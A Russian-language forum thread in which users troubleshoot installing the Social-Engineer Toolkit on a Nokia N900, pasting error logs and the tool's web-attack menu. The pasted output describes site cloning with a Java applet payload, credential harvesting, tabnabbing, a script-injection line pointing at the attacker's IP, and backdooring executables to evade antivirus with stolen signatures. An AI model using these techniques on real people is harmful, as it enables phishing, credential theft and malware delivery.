Re: Social Engineer Toolkit
А вообще кто нить что нить сделал полезного этой программой?
Интересует глобальный результат не обязательно с n900...
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Форум MaemoWorld.ru → Программы для MeeGo и Maemo (Nokia N9 / N900 / ...) → Social Engineer Toolkit
А вообще кто нить что нить сделал полезного этой программой?
Интересует глобальный результат не обязательно с n900...
Читай азы tar cd wget
почитал, поколдовал - получилось. Но опять схватил ерор:
Nokia-N900-51-1:~/rubygems# ruby1.8 setup.rb
./rubygems.rb:10:in `require': no such file to load -- rubygems/defaults (LoadError)
from ./rubygems.rb:10
from setup.rb:24:in `require'
from setup.rb:24
Nokia-N900-51-1:~/rubygems#
Поясни пожалуйста
А вообще кто нить что нить сделал полезного этой программой?
Интересует глобальный результат не обязательно с n900...
Пока нет, но как только я его установлю до конца....
Я поставил, но току нет...
Конфиг настроил...
При организации атаки в любом варианте - выдает в конце Error и предлагает попробовать еще...
Причем это и на N900 и на домашнем компе...
Dart
apt-get install ruby1.8 irb1.8 rdoc1.8 libopenssl-ruby1.8
все это уже установлено...
Итак каким то чудом я установил руби, запустил метахреновину, настроил конфиг... и вот такое г. опять у меня возникло:
настраиваю сет и в самом конце:
[*] Cloning the website: http://192.168.1.2
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: 6vmVyF
[*] Malicious java applet website prepped for deployment
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default):
Должен запуститься msf, но он конечно не запускается
По моему запустилось была надпись:
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://ТВОЙ IP/">. This could either
be from a compromised site or through XSS.
____________________________________________________________________________________________
Установи UPX unpacker отсюда code.google.com/p/pefile
установка:
python setup.py build
python setup.py install
Внимание также доступен командный центр
запуск: ./set-web
и веб интерфейс в браузере по адресу: 127.0.0.1:44444
Ну и есть какой то прогресс ии нет...
Кто что поставил и у кого эта байда заработала?
Установил как ты сказал, стало еще хуже:
-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
/bin/sh: ruby: not found
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.
Something went wrong, printing the error: [Errno 2] No such file or directory: 'src/html/msf.exe'
netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary
Usage: netstat [-laentuwxr]
netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary
Usage: netstat [-laentuwxr]
Nokia-N900-51-1:~/set#
Добавлено: 08.02.2011 16:39:48
Ну и есть какой то прогресс ии нет...
Кто что поставил и у кого эта байда заработала?
как ты смог эту хрень без проблем установить?! это первая приблуда, которою я так долго устанавливаю!
Dart
Блин не поверишь с первого раза все по инструкции... Только не той что в первом посте а та которая следующая...
Добавлено: 08.02.2011 17:49:00
Dart
А ты снеси ее полностью и поставь заново... Все равно не работает же...
Dominic если бы я знал, как это сделть, то снес бы давно
irb1.8 и ruby1.8 доступны для удаления из диспетчера приложений...
А сам SET - просто снеси всю папку в МС из под рута перегрузись и попробуй заново все по мануалу поставить... С SET я так не пробовал но пару программулин так удалял...
"Я настроил конфиг" - и бросил огрызком яблока в тех кто смеялся на заднем плане... Не важно как назвать - НАСТРОИЛ... ПОДПРАВИЛ... ИЗМЕНИЛ... Смысл сказанного не меняется от этого... А ты вместо того чтобы скалиться - взял бы и поделился опытом пользования программой... А так складывается впечатление, что сам не волочешь в теме, а только и горазд ПЕРЕПЕЧАТЫВАТЬ СТАТЬИ С СОСЕДНИХ ФОРУМОВ... (бурные овации в зале и смех сбоку, спереди и на галерке... )
Форум MaemoWorld.ru → Программы для MeeGo и Maemo (Nokia N9 / N900 / ...) → Social Engineer Toolkit
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.096 секунды (95% PHP — 5% БД) 11 запросов к базе данных